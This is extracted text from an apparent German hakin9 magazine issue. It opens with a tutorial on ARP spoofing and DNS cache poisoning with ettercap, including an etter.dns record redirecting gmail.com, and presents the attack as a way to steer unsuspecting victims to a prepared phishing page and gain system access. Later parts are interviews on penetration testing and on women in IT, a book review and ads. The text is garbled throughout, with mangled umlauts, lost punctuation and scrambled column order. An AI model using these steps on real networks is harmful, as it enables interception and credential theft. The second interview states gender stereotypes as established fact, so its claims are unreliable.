DNS Cache Poisoning
hakin9orgde 37
Vor einiger Zeit habe daruumlber geschrieben
wie man mit SET auf einfache Art und Wei-
se eine Java Applet Attacke durchfuumlhren
kann Dieser Artikel lies aber offen wie man das
Opfer auf die praumlparierte URL umleitet was mitun-
ter wahrscheinlich der schwierigste Teil des ganzen
Angriffes ist Damit eine solche Attacke aber auch
erfolgreich eingesetzt werden kann dient dieser Ar-
tikel als Ergaumlnzung um diese Informationsluumlcke zu
fuumlllen
Um ein Opfer auf eine praumlparierte Seite umzuleiten
ist DNS Cache Poisoning (auch DNS Spoofing ge-
nannt) eine effektive und schnelle Moumlglichkeit Darunter
versteht man ein Angriff wobei Eintraumlge in einem DNS
zu eigenen Gunsten manipuliert werden
Das Opfer merkt dabei im Idealfall nichts davon Die-
ses tippt wie uumlblich zum Beispiel wwwgooglech ein
nur anstatt bei der DNS-Abfrage die IP-Adresse der
Google-Server zuruumlckkommt erhaumllt das Opfer die IP-
Adresse einer praumlparierten Seite
DNS Cache Poisoning
Als Ergaumlnzung zu meinem ersten Artikel Java Applet Attacke erfahren wir hier wie wir ein Opfer mittels DNS Spoofing unbemerkt eine praumlparierte Seite unterschieben koumlnnen
IN DIESEM ARTIKEL ERFAHREN SIE WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
gement
Patrick Schmid
Abbildung 1 Eine Anfrage (rot) an Ziel
10201038
ANGRIFF
Wieder ein Beispiel dazu (Bild 2)
les nicht mehr die MAC-Adresse des Zieles son-
dern die des Angreifers zugeordnet ist
Paketes seinen ARP-Cache nach der MAC-Adres-
se des Zieles ab Aber anstatt von seinem ARP-
Cache auch die MAC-Adresse des Zieles zu erhal-
ten bekommt er die des Angreifers welche er in to-
taler Unwissenheit in sein Paket packt
Pakete aus und vergleicht diese mit seiner Zuord-
nungstabelle Anhand der MAC-Adresse (die des
Angreifers) sendet er das Paket an Port 2 und so-
mit an den Angreifer und nicht wie vom Opfer ge-
plant an das Ziel
Somit geht der Verkehr aber erst vom Opfer zum An-
greifer
Damit das Oper davon aber nichts merkt muss der
Angreifer die abgefangene Anfrage an das Ziel weiter-
leitenNun verlaumluft die Kommunikation schon vom Op-
fer uumlber den Angreifer zum Ziel
Damit man aber auch den gesamten Verkehr in die an-
dere Richtungen also Anfragen und Antworten mitkriegt
macht man ARP-Attacken immer auf den Client und den
Router Gateway gleichzeitig womit nun eine Kommuni-
kation vom Opfer uumlber den Angreifer zum Ziel und auch
wieder zuruumlck moumlglich ist Damit ist die Man-in-the-Middle-
Attacke komplett und der Angreifer ist in der Lage den
gesamten Netzwerkverkehr seines Opfers nicht nur ab-
zufangen und mit zuhoumlren sondern auch beliebig zu ver-
aumlndern was uns auch sogleich zu Schritt 2 bringt
Im ersten Artikel haben wir als Beispiel die Seite Gmail
kopiert und praumlpariert Also wollen wir auch gleich dort
anknuumlpfen
Fuumlr diese Attacke werden wir das Tool ettercap ver-
wenden da es relativ einfach aufgebaut ist dabei aber
trotzdem viele Einstellungsmoumlglichkeiten bietet
Unsere Attacke wird in zwei Stufen aufgebaut sein
Als erstes muumlssen wir das Opfer oder besser dessen
Computer dazu bringen seinen ganzen Traffic auf un-
seren Computer umzuleiten also eine sogenannte
Man-in-the-middle-Attacke ausfuumlhren
Dazu werden wir ARP Spoofing verwenden ARP ist
ein Protokoll auf Layer 2 (Sicherung) um anhand einer
IP-Adresse die zugehoumlrige MAC-Adresse abzufragen
Die Funktionsweise von ARP Spoofing ist einfach Der
Grund fuumlr dessen Erfolg ist der dynamische ARP-Cache
auf jedem Client und eine Zuordnungstabelle auf jedem
Switch Ein Switch fuumlhrt eine Zuordnungstabelle worin die
MAC-Adressen der angeschlossenen Geraumlte dem jeweili-
gem Port zugeordnet sind Diese gibt es deshalb weil ein
Switch somit genau weiss welches System an welchem
Port angeschlossen ist und somit auch an welchen Port
ein einzelnes Datenpaket weitergeleitet werden muss
Der Client fuumlhrt einen eigenen ARP-Cache worin er
eine MAC-Adresse einer IP-Adresse zuordnet sodass
er nicht vor jedem Versenden eines Paketes die MAC-
Adresse zu einer IP neu abfragen muss
Veranschaulicht koumlnnte das dann so ablaufen (Bild 1)
nen ARP-Cache nach der MAC-Adresse des Zieles
ab und packt diese danach mit in das Paket
aus und weiss anhand seiner Zuordnungstabelle
das zu dieser MAC-Adresse der Port 1 gehoumlrt wo-
rauf er das Paket an Port 1 und somit an das Ziel
weiterleitet
seines Opfers so veraumlndern dass eine IP-Adresse einer
total neuen beliebigen MAC-Adresse zugeordnet wird
Abbildung 2 Eine Anfrage (rot) an Ziel waumlhrend ARP-Spoofi ng
DNS Cache Poisoning
hakin9orgde 39
Nun gilt es fuumlr den Angreifer darauf zu warten bis das
Opfer den A-Record von gmailcom abfragt Sehen wir
nun in unserem mitgehoumlrten Traffic eine solche Anfra-
ge so muss das Antwortpaket soweit veraumlndert werden
dass anstatt die tatsaumlchliche IP-Adresse nun die IP-Ad-
resse zu unserer praumlparierten Seite uumlbermittelt wird
Das Opfer selbst empfaumlngt und akzeptiert das so
weil es selbst von der Veraumlnderung nichts mitbekommt
Alle Anfragen welche das Opfer von nun an an Gmail
macht werden nicht an Gmail selbst sondern an un-
sere praumlparierte Seite gesandt womit unser Vorhaben
erfuumlllt waumlre
So nun genug Theorie schreiten wir zur Tat
Beide Schritte koumlnnen direkt mit ettercap durchge-
fuumlhrt werden
Dabei handelt es sich um ein Stuumlck Software mit Spe-
zialisierung auf Man-in-the-Middle-Attacken welches
unter der GPL wahlweise fuumlr Windows Linux oder Mac
veroumlffentlicht wurde
Leider wurde es seit einiger Zeit nicht mehr weiter-
entwickelt was sich jedoch nicht auf die Funktionalitaumlt
auswirkt
Ettercap kann wahlweise via GUI oder Konsole be-
dient werden doch erstmal wird alles konfiguriert
Zuerst muumlssen wir unsere eigenen A-Rekords fuumlr
gmailcom anlegen Dazu editieren wir die Datei usr
shareettercapetterdns und erweitern diese um einen
Eintrag wie in Listing 1 dargestellt
Wenn wir nun speichern so haben wir festgelegt
dass Anfragen nach der IP von gmailcom oder gmail
com mit 127001 beantwortet werden sollen
Somit sind wir auch schon bereit und koumlnnen bereits
mit Schritt 1 beginnen
Dazu starten wir ettercap und waumlhlen unter dem
Punkt Sniff den Unterpunkt Unified sniffing aus Dabei
werden wir nach dem Interface gefragt uumlber welches
der Angreifer mit dem Netzwerk des Opfers verbunden
ist Im Falle einer Verbindung via Kabel ist das meist
eth0 bei WLAN meist wlan0
Ist auch das vollbracht so koumlnnen das oder die Ziele
identifiziert werden Dazu waumlhlen wir den Punkt Hosts gt
Scan for hosts wodurch automatisch alle 255 Hosts im
Subnet angepingt werden (Bild 3)
Ist auch das durchgestanden so koumlnnen die Ziele un-
ter Hosts gt Hosts list ausgewaumlhlt werden Als Target 1
muss der Router oder Gateway und das Opfer als Tar-
get 2 ausgewaumlhlt werden Hier muss gegebenenfalls
mit nmap nach gepruumlft werden um die IP des Opfers zu
identifizieren
Nun kann mit dem Selektieren von Mitm gt Arp poiso-
ning die ARP-Attacke gestartet und Schritt 1 somit be-
endet werden
Wird nun Wireshark oder tcpdump gestartet so kann
man allen Netzwerkverkehr des Opfers und des Rou-
ters Gateways mitgehoumlrt werden
Nun gleich weiter zu Schritt 2 Nachdem die Man-in-
the-Middle-Attacke steht koumlnnen wir dem Opfer nun
unsere DNS-Records aufzwingen
Dazu verwenden wir die ettercap-Plugins unter dem
Punkt Plugins gt Manage the plugins Da waumlhlen wir den
Punkt dns_spof aus
Und somit ist unser DNS-Spoofing-Angriff einsatzfauml-
hig und aktiv
Wem als Angreifer kein GUI zur Verfuumlgung steht der
kann auch den interaktiven Modus von ettercap ver-
wenden Dazu muss ettercap nur mit der Option -T auf-
gerufen werden Alles weitere ist dann in der Hilfe (h-
Taste) nachzulesen
Nun ist alles getan Jedes mal wenn nun unser Op-
fer die Webseite von Gmail aufruft wird es auf unsere
praumlparierte Seite umgeleitet ohne dass es davon etwas
merkt
In Kombination mit SET erhaumllt ein Angreifer so muumlhe-
los Zugriff auf ein fremdes System
Listing 1 ein A-Record fuumlr eine praumlparierte Seite von gmailcom
gmailcom A 127001
gmailcom A 127001
Abbildung 3 GTK-GUI von ettercap
Linkshttpseiconch Unternehmen des Autorshttpblogencodingitch
PATRICK SCHMIDDer Autor ist System Engineer im Bereich Linux Unix und unterstuumltzt nebenbei die Entwicklung und Verbreitung von Li-nux und Opensource im privaten wie auch im professionellen Umfeld
Interview mit Tobias Glemser
hakin9orgde 41
hakin9 Erzaumlhlen Sie uns bitte ein wenig uumlber sich selbst wer sind Sie was machen Sie und wie ist es dazu gekommen dass Sie sich mit IT-Sicherheit Branche beschaumlftigenTobias Glemser Mein Name ist Tobias Glemser ich bin leitender IT-Sicherheitsberater bei der Tele-Consul-ting security networking training GmbH in Gaumlufelden bei Stuttgart und verantwortlich fuumlr den Geschaumlftsbereich Penetrationstests Zu Schul- und Zivildienstzeiten hatte ich bereits den ersten Kontakt mit technischen Audits und habe schlicht das Hobby zum Beruf gemacht Seit uumlber zehn Jahren bin ich in entsprechenden Projekten taumltig Am Wichtigsten ist der kreative Umgang mit Sys-temen und Anwendungen Funktionen die ein Entwick-ler nach besten Wissen und Gewissen implementiert hat so zu nutzen dass sie nicht mehr dem urspruumlngli-chen Zweck dienen Im Projektumfeld erhaumllt man viele Einblicke in Techniken und Prozesse in unterschiedli-chen Firmen und Behoumlrden z B Energie Flugraum-uumlberwachung Banken Neben den technischen Aspek-ten ist es mein und unser Ziel mit allen Beteiligten des Kunden ein gemeinsames Ziel zu erreichen So waumlre es aus meiner Sicht unsinnig technische Schwachstellen mit rein technischen Hilfestellungen zu beheben Der Ansatz springt deutlich zu kurz Vielmehr geht es auch darum auf Prozesse abzuleiten und diese zu verbes-sern Diese Nachhaltigkeit und die positiven Ruumlckmel-dungen treiben an Daruumlber hinaus bin ich frei in der Beratung d h wir haben keine Produkte im Portfolio die bei einem technischen Audit moumlglichst gleich mit an-gepriesen werden muumlssen
hakin9 Bereits bei mehreren tausend Tests von Netzen und Systemen haben Sie den selbstentwickelten Security Scanner tajanas genutzt Was unterscheidet tajanas von anderen solchen WerkzeugenTobias Glemser Wir haben tajanas zunaumlchst fuumlr ei-gene Zwecke entwickelt und setzten es auch heute als Basis in Penetrationstests ein tajanas ist ein Frame-
work und Webfrontend fuumlr die grundsaumltzliche Pruumlfung eines Systems mit automatisierten Port- und Vulnera-bility-Scans und einheitlichem Reporting pro System Wir haben dabei das Ziel verfolgt nicht das Rad neu zu erfinden sondern etablierte Programme fuumlr die ei-gentlichen Pruumlfungen zu nutzen Die Ergebnisse der einzelnen Schritte werden analog zu einer manuellen Pruumlfung mit den jeweiligen Programmen automatisiert verknuumlpft Dies ermoumlglicht eine wesentliche schnellere Durchfuumlhrung bei gleicher Ergebnis-Qualitaumlt Daruumlber hinaus ist die Oberflaumlche so gehalten dass nur die not-wendigsten Optionen zur Verfuumlgung stehen
Neben der Schwachstellen-Pruumlfung ist auch eine Erreichbarkeitspruumlfung integriert um einen schnellen Uumlberblick uumlber aktive Systeme in Netzen zu erhalten
Es ist wichtig zu verstehen dass Penetrationstests ohne automatisierte Tests nicht funktionieren Die schie-re Anzahl an Schwachstellen laumlsst sich nur sinnvoll mit entsprechenden Programmen pruumlfen Die Ergebnisse sind dann die Basis fuumlr weitere manuelle Tests Dabei wird mit Know-How und Kreativitaumlt versucht weitere Luumlcken zu finden um und diese dann auszunutzen
hakin9 Wie erfolgt die Bedienung des Scanners und welche Lizenzen und Module existierenTobias Glemser Die Bedienung erfolgt vollstaumlndig uumlber eine webbasierte Oberflaumlche tajanas wird als VM-ware- oder Hardware-Appliance ausgeliefert der End-benutzer kann alle Funktionen ndash dazu gehoumlren auch Ak-tualisierungen ndash uumlber die Weboberflaumlche nutzen Jeder Nutzer erhaumllt natuumlrlich trotzdem vollstaumlndigen Root-Zu-griff auf das System Die Lizenzierung erfolgt pro In-stallation eine Limitierung auf IP-Adressen oder eine gewisse Anzahl Scans erfolgt nicht Neben dem Audit-Modul gibt es auch ein Modul fuumlr die Erreichbarkeits-pruumlfung
hakin9 Woher kommt der Name tajanasTobias Glemser tajanas steht fuumlr bdquothis ainrsquot just ano-ther network scannerrdquo ndash weil es ein wie beschrieben ein
bdquoSicherheit darf nicht erst am Ende von neuen Anwendungen Produkten oder Projekten als Kontrollinstrument einbezogen sondern muss als integraler und vor Allem unterstuumltzender Bestandteil eines erfolgreichen Produkts gesehen werdenldquoInterview mit Tobias Glemser
10201042
INTERVIEW
Nach der Durchfuumlhrung erhaumllt der Kunde einem umfas-senden auf seine Umgebung und Realitaumlt angepass-ten Ergebnisbericht der im Rahmen eines Abschluss-Workshops mit den technischen verantwortlichen besprochen wird Auf Wunsch erfolgt auch die Darstel-lung vor dem Vorstand bzw der Leitungsebene
Das Spektrum eines Penetrationstests ist sehr viel-faumlltig und laumlsst sich nur schwer darstellen Es handelt sich dabei jedoch nicht zwingend um die bdquobekanntenldquo Pruumlfungen auf Serversysteme Haumlufige Einfallstore fuumlr Angreifer sind schlecht gesicherte lokale Netzwerke Client-Systeme oder auch Multifunktionsdrucker Bei Interesse finden sich Informationen z B in der Studie Penetrationstests des BSI dem Whitepaper Penetrati-
onstests der Tele-Consulting oder auch dem Whitepa-per Projektierung der Sicherheitspruumlfung von Weban-
wendungen der OWASP
hakin9 Welche Plaumlne die IT-Sicherheit Branche betreffend haben Sie noch vorTobias Glemser Abseits von technischen Audits ver-suchen wir ganzheitliche Prozesse vor allem aber nicht nur in den IT-Abteilungen zu etablieren und dabei Ad-ministratoren die Hilfestellungen zu geben die sie da-bei benoumltigen Als Sicherheitsberater oder auch Sicher-heitsbeauftrager eines Unternehmens nimmt man meist die Rolle eines Kontrolleurs ein der darauf achtet dass Regeln eingehalten werden Hier ist ein Wandel erfor-derlich sowohl bei denen die sich bdquoSicherheitldquo auf die Fahnen schreiben als auch bei den Administratoren und Verantwortlichen fuumlr Geschaumlftsbereiche und deren Technik Sicherheit darf nicht erst am Ende von neuen Anwendungen Produkten oder Projekten als Kontrollin-strument einbezogen sondern muss als integraler und vor Allem unterstuumltzender Bestandteil eines erfolgrei-chen Produkts gesehen werden Hier muumlssen auch und vor allem Sicherheitsberater umdenken um vorrangig als Unterstuumltzer die sie sind gesehen und akzeptiert zu werden Nur so begreifen die technisch verantwort-lichen Mitarbeiter Sicherheitspruumlfungen nicht als Pruuml-fungen ihrer persoumlnlichen Kompetenz sondern als kon-krete Unterstuumltzung fuumlr die Verbesserung vorhandener Sicherheitsprozesse
Im Bereich der technischen Schwachstellen werden weiterhin Webanwendungen eine groszlige Rolle spielen Daher bin ich seit geraumer Zeit beim Open Web Appli-cation Security Project (OWASP) den meisten vermut-lich durch die OWASP Top 10 bekannt ehrenamtlich taumltig und seit diesem Jahr im Board der deutschen Sek-tion Beim OWASP Stammtisch Stuttgart (und Stamm-tischen in anderen Staumldten) tauschen sich hier auch Menschen rund um das Thema zwanglos aus Wer Lust hat vorbeizukommen kann sich auf der deutschen OWASP Webseite informieren
Wir bedanken uns fuumlr das Gespraumlch
Framework darstellt und nicht den n-ten Port- oder Vul-nerability-Scanner Wenn wir Bugs in den verwendeten Programmen feststellen oder Ideen fuumlr Erweiterungen haben geben wir diese direkt in die Community zuruumlck
hakin9 Wer sind Benutzer von tajanasTobias Glemser Zum einen natuumlrlich wir selbst Zum anderen setzten IT-Sicherheitsbeauftragte und IT-Revi-soren das Tool fuumlr regelmaumlszligige Sicherheitspruumlfungen ihrer Netze ein
hakin9 Fuumlr welche Faumllle reichen Penetrationstests nicht ausTobias Glemser Das haumlngt von der Zieldefinition des Kunden ab und was man unter einem Penetrationstest versteht Bei Tele-Consulting sind alle Mitarbeiter nicht nur in technische Audits wie Penetrationstests eingebun-den sondern auch in prozessorientierte Beratungen und Audits wie z B ISO 27001 oder BSI IT-Grundschutz Dies ermoumlglicht es uns in technischen Audits nicht nur die technischen Luumlcken aufzuzeigen sondern auch auf fehlende oder mangelhafte Prozesse hinzuweisen und konkrete Vorschlaumlge zur Verbesserung zu geben
hakin9 Koumlnnen Sie uns ein konkretes Beispiel nennenTobias Glemser Nehmen wir an dass aus Wirtschaft-lichkeitsgruumlnden nicht alle Server in einem Netz in ein technisches Audit einbezogen werden sondern nur eine definierte Anzahl Stellt man hier Schwachstellen fest so genuumlgt es nicht die erkannten Schwachstellen oder gar Luumlcken zu schlieszligen sondern man muss sich fra-gen wie es zu den Schwachstellen kommen konnte In den seltensten Faumlllen haben hier Administratoren indi-viduelle Fehler gemacht vielmehr scheinen offensicht-lich die Vorgaben zur Serverkonfiguration bzw Haumlrtung nicht ausreichend zu sein bzw diese in ein Information Security Management System (ISMS) integriert zu sein Darauf weisen wir nachdruumlcklich in unseren Ergebnis-berichten hin um eine Gesamtverbesserung zu erzie-len und unterstuumltzen bei Bedarf auch bei der Umset-zung der organisatorischen Anteile
Geht man diesen Schritt nicht werden erfahrungs-gemaumlszlig nur die Systeme veraumlndert bei denen im Test Schwachstellen erkannt wurden Der Verbesserung der Gesamtsicherheit hilft dies dann allerdings nicht
hakin9 Wie sieht eine Sicherheitsuumlberpruumlfung mithilfe des Penetrationstests ausTobias Glemser Zunaumlchst bedarf es einer klaren Ziel-vorstellung Entweder haben Kunden diese bereits oder sie wird im Rahmen eines Workshops gemeinsam erarbeitet Dabei ist es meist sinnvoll mehrstufig vorzu-gehen und die Themen in verschiedenen Arbeitspake-ten abzuarbeiten Im Rahmen eines Kick-Offs werden die Beteiligten informiert und in den Ablauf integriert
10201044
INTERVIEW
hakin9 Lassen Sie uns bitte ein wenig uumlber sich selbst wissen wer sind Sie was machen Sie und wie ist es dazu gekommen dass Sie in der IT-Branche taumltig sindUlrike Peter Ich bin PR-Spezialistin und Journalis-tin durch und durch Die Liebe zum Schreiben ent-deckte ich fruumlh Nach ersten Gehversuchen als freie Mitarbeiterin bei einer Tageszeitung absolvierte ich vor zehn Jahren ein Volontariat in einer PR-Agentur mit parallelem Fernstudium bdquoJournalismusldquo Die ers-ten Tage in der Agentur waren wie ein Kopfsprung ins kalte Wasser Denn obwohl ich das journalistische Ruumlstzeug besaszlig wusste ich anfangs nicht mal wo sich die Escape-Taste an meinem PC befand hatte aber die Aufgabe ohne spezielles Hintergrundwissen uumlber komplexe Technologien detaillierte Berichte zu formulieren Da dies den Ehrgeiz in mir weckte ar-beitete ich mich schnell in die Materie ein und stell-te fest dass Public Relations in Verbindung mit der Erstellung technologischer Texte mein Steckenpferd ist Heute bin ich Geschaumlftsfuumlhrerin meiner eigenen PR-Agentur und obwohl ich mittlerweile auch in wei-teren Branchen und Aufgabengebieten zuhause bin ist die Freude daran bdquotrockeneldquo und komplexe Inhalte lebendig werden zu lassen noch genauso vorhanden wie am ersten Tag
hakin9 Viele glauben dass Computer Maumlnnersache sind Was halten Sie davonUlrike Peter Die landlaumlufige Meinung existiert nach wie vor dass Maumlnner ein besseres technologisches Verstaumlndnis mitbringen Dies resultiert nicht selten aus Vorurteilen laumlsst sich aber auch nicht komplett abstreiten Denn nicht nur Erfahrungswerte sondern auch Belege aus der Hirnforschung zeigen dass Frauen besser mit Sprache umgehen koumlnnen und Maumlnner sich in Naturwissenschaften wohler fuumlhlen Es liegt wohl ein Stuumlck weit in der Natur der Sache
Aber wie heiszligt es so schoumln bdquoAusnahmen bestaumltigen die Regelldquo Und der Trend zeigt beispielsweise dass Frauen zunehmend technische Studiengaumlnge bele-gen
hakin9 Heutzutage sind wir uumlberall von Computern umgeben In der IT-Branche herrscht trotzdem ein Frauenmangel Woran liegt dies Ihrer Meinung nachUlrike Peter Noch lockt es wesentlich mehr Maumlnner in technische Berufe als Frauen Ich denke das Verhaumlltnis wird auch in Zukunft so bleiben ndash auch wenn sich die klassische Rollenverteilung verschiebt und die bdquoGren-
bdquoErfolgreiche Frauen in der IT-Branche - ein Erfahrungsberichtldquo
Interview mit Ulrike Peter
Interview mit Ulrike Peter
hakin9orgde 45
Vorgesetzten und zum anderen nach den Faumlhigkeiten der Frau Jeder Mitarbeiter der neu eingestellt wird steht vor der Aufgabe sich zu beweisen ndash und sollte die Moumlglichkeit dazu erhalten Jedoch werden Frau-en in typischen Maumlnnerberufen oft kritischer beaumlugt und stehen laumlnger auf dem Pruumlfstand Dies passiert teils unbewusst Auch beweisen Studien immer wie-der dass maumlnnliche Arbeitnehmer im gleichen Job mehr verdienen als weibliche Hier macht die Gesell-schaft aber eine Entwicklung durch und dies reguliert sich sicherlich zumindest ein Stuumlck weit im Laufe der naumlchsten Jahre
hakin9 Was macht Ihnen am meisten Spaszlig bei der Arbeit in der IT-BrancheUlrike Peter Bevor ich mich selbstaumlndig machte war ich bereits in einem anderen Unternehmen in der Ge-schaumlftsleitung taumltig ndash jedoch konnte ich den Stift zum Schreiben nie aus der Hand legen Es reizt mich im-mer wieder neue technologische Themen zu erkunden und dabei nicht nur an der Oberflaumlche zu kratzen son-dern Detailtiefe zu erlangen um fundiert und lesens-wert uumlber ein Thema berichten zu koumlnnen Im Laufe der Jahre habe ich eine starke Affinitaumlt zur IT-Security entwickelt Ich finde es spannend uumlber Sicherheits-luumlcken Verschluumlsselungstechniken und vieles weite-re zu schreiben Daruumlber hinaus macht es mir groszligen Spaszlig IT-Unternehmen durch die richtige PR-Strategie nach vorn zu bringen und entsprechende Maszlignahmen in die Tat umsetzen Beim Kennenlernen eines poten-ziellen Neukunden im ersten Moment manchmal hin-sichtlich der technischen Fachkompetenz unterschaumltzt zu werden und dann schnell durch Know-how zu uumlber-zeugen bestaumltigt mich immer wieder in dem was ich tue
hakin9 Was sollte unternommen werden um die Ressentiments von Frauen gegenuumlber IT-Jobs abzubauenUlrike Peter Ich glaube dem kann man bzw Frau nur entgegenwirken indem sie den Mut hat ihre Interessen zu verfolgen und sie unter Beweis zu stellen Aus Er-fahrung wenn jemand seine Faumlhigkeiten zeigt und en-gagiert an eine Sache herangeht ruumlckt das Geschlecht automatisch in den Hintergrund
Wir bedanken uns fuumlr das Gespraumlch
zenldquo in beide Richtungen mehr und mehr verschwim-men Denn auch Maumlnner finden wir heute in Berufen die vor Jahren ausschlieszliglich Frauen zugeordnet wur-den Und wir sind zwar von elektronischen Geraumlten wie PCs Smartphones etc umgeben und diese werden auch rege von beiden Geschlechtern genutzt ndash aber ei-nen technischen Job zu ergreifen ist ein anderes paar Schuhe Hierzu gehoumlrt ein besonderes Faible Die Be-weggruumlnde weshalb in diesem Segment Frauenman-gel herrscht sind meiner Meinung nach Ihnen fehlt manchmal der Mut sie erhalten nicht immer die glei-chen Chancen oder ndash und das wird der Hauptgrund sein ndash es liegen schlichtweg die Interessen in anderen Be-reichen
hakin9 Woraus resultieren die Vorurteile gegen die Frauen die sich mit Computern beschaumlftigenUlrike Peter Die IT ist (und bleibt es sicher auch) eine Maumlnnerdomaumlne ndash Frauen in der IT-Branche sind Para-diesvoumlgel Wie in allen Berufen in denen seit jeher ein Geschlecht etabliert ist sich Prozesse eingeschliffen und bewaumlhrt haben ist es erst einmal fremd und ge-woumlhnungsbeduumlrftig wenn sie sich veraumlndern So liegen die Vorurteile zum einen daran dass es nicht uumlblich ist wenn Frauen in diesen Berufen arbeiten und Maumlnnern die bdquoTechnikldquo zugeordnet wird ndash zum anderen resultie-ren sie daraus dass die unterschiedlichen Faumlhigkeiten und Interessen der Geschlechter einfach naturgege-ben sind So wie kleine Jungen mit Autos spielen und Maumldchen mit Puppen stecken auch spaumlter gewisse Verhaltensweisen und Interessen in uns die bereits in der Kindheit gepraumlgt werden Greift das weibliche Ge-schlecht im Berufsleben ploumltzlich zum bdquoAutoldquo so ist dies ungewoumlhnlich und wird erst einmal hinterfragt
hakin9 Wie sieht die Situation von Frauen in der IT-Branche aus Ist es leicht als begabte IT-Expertin einen Job in einem Unternehmen zu bekommenUlrike Peter Frauen in der IT-Branche sind haumlufig in Marketingabteilungen zu finden ndash aber zum Beispiel auch bei der schreibenden Zunft in Fachverlagen In diesen Jobs herrscht in meinen Augen Chancengleich-heit Als IT-Expertin in einem technischen Beruf wie Ad-ministrator Entwickler oder Aumlhnliches sieht es dagegen anders aus In diesem Segment haben es weibliche Fachkraumlfte meiner Ansicht nach schwerer Die Huumlrde zum Bewerbungsgespraumlch eingeladen zu werden ist houmlher Bekommt sie die Chance dazu wird vielleicht et-was genauer hingeschaut aber letztlich zaumlhlt die Kom-petenz die unterm Strich den entscheidenden Aus-schlag geben wird
hakin9 Wie werden Frauen von Maumlnnern als ihre Mitarbeiter wahrgenommenUlrike Peter Dies laumlsst sich nicht pauschalisieren und richtet sich zum einen nach der Einstellung des
10201046
REZENSIONEN
Das Buch SAP for DFPS Implementierung und Customizing basiert auf mehr als 20 Jahren Er-fahrung die die Autoren insgesamt bei der Ent-
wicklung Implementierung aber auch Schulung der Loumlsung sammeln konnten
Die uumlber 650 Seiten vollgepacktes Wissen sollten sie nicht abschrecken dieses Buch in die Hand zu nehmen Es ist sehr gut und fluumlssig geschrieben Man schafft es sollten sie ein schneller LeserIn sein in zwei Tagen
Sie benoumltigen keine tiefgreifenden SAP-Kenntnisse zum Verstaumlndnis daher ist es fuumlr Entscheider genauso geeignet wie fuumlr Projektleiter Architekten funktionale Mitarbeiter Basismitarbeiter oder externe Berater
Komplexe Zusammenhaumlnge werden sehr schoumln und bildhaft beschrieben damit auch fuumlr den SAP-Laien das Vorgehen verstaumlndlich beschrieben wird Erwaumlh-nenswert finde ich in diesem Zusammenhang Rubiks Zauberwuumlrfel
Das Buch ist sehr strukturiert aufgebaut und umfasst unverzichtbare Grundlagen in den Teilen I-IIIFuumlr Experten wird es dann in Teil IV richtig spannend und interessant
Die von SAP entwickelte fast eierlegende Wollmilch-sau erfordert ein umfangreiches Nachschlagewerk zur Implementierung Den Autoren ist dies hiermit gelun-gen
Ihnen ist es auszligerdem gelungen aufzuzeigen wie komplexe bdquoUnternehmensstrukturenldquo bewaumlltigt und Kos-ten reduziert und kontrolliert werden koumlnnen
Das Beispielprojekt bdquoTsunamildquo verdeutlicht dabei an einem nicht so komplexen Projekt die Anforderungen Beleuchtet wird zB wie militaumlrische Kernprozesse wie etwa die Logistik substanzielle Einsparungen von ca 30 erzielen koumlnnten als auch die Unterstuumltzung von Einsaumltzen verbessert werden koumlnnten (Beschleunigung der Verlegung um bis zu 50 -70)
Des Weiteren wird die Interoperabilitaumlt sehr schoumln he-raus gestellt und die integrativen Aspekte stets im Blick behalten
Hervorheben sollte man die organisatorische Flexi-bilitaumlt und Logistik wie das Logistic Assessment Pro-zessmanagement Qualification Management inkl der Uumlbernahme von Trainingsdaten das Managementkon-zept BSC (Balanced Scorcard) die Einsatzmoumlglichkei-ten von mobilen Anwendungen fuumlr Schutzaufgaben SOA und NCW bzw NetFuumlOp mit DFPS
Der Mehrwert wird zB am Meldewesen der NC3A durch Automatisierung von weiten Teilen schoumln heraus gearbeitet
Die ausfuumlhrlichen bebilderten Beispiele stellen eine gelungene Verbindung zwischen Theorie und Praxis bzw Anwendung dar In der SAP-typischen Struktur wurden die neuen und bereits erwaumlhnten Funktionen sinnvoll und gekonnt integriert
Des Weiteren findet sich fuumlr die richtige IT-Architektur ein schoumln gefuumlllter Werkzeugkasten mit den dazuge-houmlrigen Dorsquos and Dontrsquos Natuumlrlich darf auch das best practices nicht fehlen sowie der Ausblick auf zukuumlnftige Entwicklungen
Egal ob sie sich fuumlr eine Neuintegration oder eine Co-re2Defense Loumlsung entscheiden
die Kapitel zu den Themen
moumlchte ich ihnen unbedingt ans Herz legen
FAZITDieses Buch sollte keinem Entscheider und IT-Verant-wortlichen vorenthalten werden
Praumldikat besonders empfehlenswert
Autor Nicole Huck
SAP for DFPSImplementierung und CustomizingGalileo Press Bonn 20101 Auflage 2010AutorenBernhard EscherichHeinrich PfriemerWolfgang Ullwer
Datenschutz ist EU-weit gesetzliche Anforde-
rung Wir sorgen fuumlr die Erfuumlllung rechtlicher
Vorschriften und kuumlmmern uns um ein ange-
messenes Datenschutzniveau in Ihrem Unter-
nehmen auch international
wwwblossey-partnerde
Recommended Sites
Securitymanagerde ist eine Produktion des
Online-Verlag FEiG amp PARTNER Seit dem
Start hat sich Securitymanagerde zu einem
fuumlhrenden Online-Informationsportal in
Deutschland entwickelt und versteht sich als
unabhaumlngiger Informationsdienstleister der
IT- und Information-Security-Branche
wwwsecuritymanagerde
Pericom base camp IT-Security Unser Ziel ist
es unsere Kunden vor moumlglichen Gefahren
fuumlr Ihre IT-Infrastruktur bestmoumlglich zu schuumlt-
zen Neben der Analyse von Risikopotentia-
len durch Security Audits bieten wir durch
die Implementierung von Security-Loumlsungen
Schutz vor konkreten Gefahren
wwwpericomat
Happy-Security ist ein neues Portal mit Secu-
rity-Challanges IT-Quiz Web-Bibliothek Multi-
media-Center amp vielen weiteren Features
wwwhappy-securityde
CloudSafe stellt seinen Nutzern eine Plattform
zur kryptographisch sicheren Ablage und Verwal-
tung von sensiblen Daten zur Verfuumlgung Nutzer
koumlnnen auf CloudSafe beliebig viele Dokumente
in virtuellen Safes ablegen Es koumlnnen weite-
ren Personen individuelle Zugriffsrechte auf die
Safes eingeraumlumt und somit ein sicherer Daten-
austausch ermoumlglicht werden
wwwcloudsafecom
AV-Comparatives geht hervor aus dem Inns-
brucker Kompetenzzentrum und gilt als eines
der bekanntesten unabhaumlngigen Testhaumluser
fuumlr Antiviren-Software
wwwav-comparativesorg
Die Seed Forensics GmbH bietet fuumlr Strafver-
folgungsbehoumlrden professionelle Unterstuumltzung
in den Bereichen der Datensicherstellung und
Datentraumlgerauswertung Selbstverstaumlndlich
entsprechen unsere Mitarbeiter unser tech-
nisches Equipment und auch unsere Raumlumli-
chkeiten den notwendigen Anforderungen
wwwseed-forensicsde
